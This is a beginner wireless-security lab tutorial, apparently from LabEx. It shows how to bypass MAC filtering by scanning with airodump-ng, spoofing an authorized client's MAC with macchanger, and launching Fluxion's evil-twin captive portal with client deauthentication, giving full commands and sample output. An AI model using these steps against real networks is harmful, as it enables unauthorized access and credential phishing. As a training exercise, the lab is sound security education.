LabEx
Log InJoin Free

Bypass MAC Address Filtering during an Attack

Beginner
Practice Now

Introduction

MAC (Media Access Control) address filtering is a network security measure where a router or access point (AP) is configured to accept traffic only from devices with specific, pre-approved MAC addresses. While it can deter casual intruders, this security layer can be bypassed through a technique called MAC spoofing.

In this lab, you will learn the end-to-end process of bypassing MAC address filtering. You will first identify a target network, find the MAC address of an already authorized client, and then change your own wireless adapter's MAC address to impersonate that client. Finally, you will see how this allows a tool like Fluxion to successfully initiate an attack that would otherwise be blocked. This lab is for educational purposes to help you understand network vulnerabilities.

Identify a Network Potentially Using MAC Filtering

In this step, you will install the necessary tools and scan for nearby wireless networks. The first part of any wireless assessment is reconnaissance. We need to see what networks are available and choose a target.

First, let's update the package list and install the aircrack-ng suite, which contains the tools we need for scanning.

sudo apt-get update
sudo apt-get install -y aircrack-ng

Next, you need to put your wireless adapter into "monitor mode." This mode allows the adapter to capture all Wi-Fi traffic in the air, not just traffic addressed to it. In this simulated environment, your wireless adapter is named wlan0.

Run the following command to start monitor mode:

sudo airmon-ng start wlan0

You should see output indicating that monitor mode has been enabled. The command will also create a new virtual interface, typically named wlan0mon.

PHY     Interface       Driver          Chipset

phy0    wlan0           iwlwifi         Intel Corporation Wireless
        (monitor mode enabled on wlan0mon)

Now, use airodump-ng with the new monitor interface (wlan0mon) to scan for all wireless networks in range.

sudo airodump-ng wlan0mon

Let the scan run for a minute. You will see a list of detected access points. For this lab, we will assume our target network has the ESSID (network name) "Target-Net". Press Ctrl+C to stop the scan once you see it.

 CH  6 ][ Elapsed: 10 s ][ 2023-10-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:22:33:44:55  -30       10        0    0   6  54e  WPA2 CCMP   PSK  Target-Net
 F8:E4:3B:9A:1B:C0  -65        8        0    0   1  54e  WPA2 CCMP   PSK  Other-Net

From this output, note the BSSID (00:11:22:33:44:55) and CH (channel 6) of our "Target-Net". We will need this information in the next step.

Use 'airodump-ng' to Find a Connected Client's MAC Address

In this step, you will focus your scan on the target network to identify any clients that are already connected. To bypass MAC filtering, you need to impersonate a device that is already on the "allow list." Finding a connected client's MAC address is the key to this.

Using the BSSID and channel you identified in the previous step, run airodump-ng again. This time, you will add options to filter the scan to only show information about our target network. This makes the output cleaner and helps you find clients more easily.

Replace 00:11:22:33:44:55 with the BSSID of your target network and 6 with its channel.

sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 wlan0mon

The output will be split into two parts. The top part shows information about the Access Point (AP), and the bottom part shows connected clients (stations).

 CH  6 ][ Elapsed: 25 s ][ 2023-10-27 10:32

 BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:11:22:33:44:55  -32  100       30       20    1   6  54e  WPA2 CCMP   PSK  Target-Net

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -40    1- 0      0       15

Look at the bottom section under STATION. This is the MAC address of a client connected to the "Target-Net" AP. In this example, the client's MAC address is AA:BB:CC:DD:EE:FF.

Copy this STATION MAC address. You will use it in the next step to spoof your own MAC address. Once you have the address, you can stop the scan by pressing Ctrl+C.

Use 'macchanger' to Spoof Your Adapter's MAC to the Client's MAC

In this step, you will change your wireless adapter's MAC address to the one you captured from the legitimate client. This process is called MAC spoofing.

First, you need to install macchanger, a simple utility for viewing and manipulating MAC addresses.

sudo apt-get install -y macchanger

Before changing the MAC address, you must stop the monitor mode interface and take the physical wireless interface down.

sudo airmon-ng stop wlan0mon
sudo ifconfig wlan0 down

Now, use macchanger to set the new MAC address. Use the -m option followed by the client's MAC address you noted in the previous step (AA:BB:CC:DD:EE:FF).

sudo macchanger -m AA:BB:CC:DD:EE:FF wlan0

The output will show you the original (Permanent) MAC and confirm the new, spoofed MAC.

Current MAC:   00:0c:29:12:34:56 (unknown)
Permanent MAC: 00:0c:29:12:34:56 (unknown)
New MAC:       AA:BB:CC:DD:EE:FF (unknown)

Finally, bring the wireless interface back up for the changes to take effect.

sudo ifconfig wlan0 up

You can verify that the MAC address has been changed by running ifconfig wlan0 and checking the ether field. Your adapter is now impersonating the legitimate client.

Launch the Fluxion Attack with the Spoofed MAC Address

In this step, you will launch an attack tool called Fluxion. The goal is to demonstrate that with your spoofed MAC address, the tool can successfully associate with the target AP, a step that would fail if the network were using MAC filtering and you had a random, unauthorized MAC.

First, you need to download Fluxion from its official GitHub repository.

git clone https://www.github.com/FluxionNetwork/fluxion.git

Navigate into the newly created fluxion directory.

cd fluxion

Now, launch the Fluxion script with sudo privileges.

sudo ./fluxion.sh

Fluxion is an interactive script. You will be prompted to make several selections. Follow these prompts:

  1. Language Selection: Press Enter to select English (or type the corresponding number).
  2. Wireless Adapter Selection: Fluxion will detect your wlan0 adapter. Select it by typing its number and pressing Enter.
  3. Channel Selection: Choose the option to scan for networks (e.g., "All channels scanner").
  4. Target Selection: After the scan, a list of networks will appear. Find "Target-Net" and type its number, then press Enter.
  5. Attack Selection: Choose an attack. For this demonstration, select the Captive Portal attack.
  6. Handshake Check: Fluxion will check for a valid handshake file. Choose the option to skip or perform a deauthentication attack to capture one.

The critical part of this step is observing that Fluxion can proceed through these initial stages. Because your MAC address is now on the AP's "allow list," Fluxion's attempts to communicate and associate with the AP will succeed.

Verify the Attack Proceeds Past the Association Stage

In this final step, you will observe the output from Fluxion to confirm that the MAC spoofing was successful. You don't need to complete the full attack; the goal is simply to verify that you have bypassed the initial security check.

After you select the Captive Portal attack in Fluxion, the tool will begin its process. You should see messages in the terminal indicating that it is:

  • Creating a fake Access Point (AP).
  • Attempting to deauthenticate clients from the real AP.
  • Waiting for a client to connect to the fake AP.

The key observation here is the absence of an "association failed" error. If you had tried to run this attack without spoofing your MAC address, Fluxion would likely fail at the very beginning because the target AP would reject any connection attempts from your unauthorized MAC address. The fact that the attack proceeds to the stage of setting up a fake AP and deauthenticating clients is proof that you have successfully bypassed the MAC filter.

Once you have seen these messages and confirmed the attack is proceeding, you can safely stop the script by pressing Ctrl+C in the terminal.

As a final piece of good practice, you should always restore your adapter's original MAC address after you are finished.

First, bring the interface down:

sudo ifconfig wlan0 down

Use macchanger with the -p (permanent) option to restore the original hardware MAC address.

sudo macchanger -p wlan0

Finally, bring the interface back up.

sudo ifconfig wlan0 up

You have now successfully demonstrated how to bypass MAC filtering and cleaned up by restoring your original configuration.

Summary

In this lab, you successfully learned and executed the technique of bypassing MAC address filtering on a Wi-Fi network.

You started by using the aircrack-ng suite to scan for networks and identify a target. You then focused on that target with airodump-ng to find the MAC address of an already authorized client. Using macchanger, you spoofed your wireless adapter's MAC address to impersonate that client. Finally, you launched the Fluxion tool and verified that the attack could proceed past the initial association stage, proving that the MAC filtering security measure had been effectively bypassed.

This hands-on experience demonstrates a common vulnerability in network security and highlights the importance of using stronger security measures, such as WPA2/WPA3 with a strong password, instead of relying on easily spoofed identifiers like MAC addresses.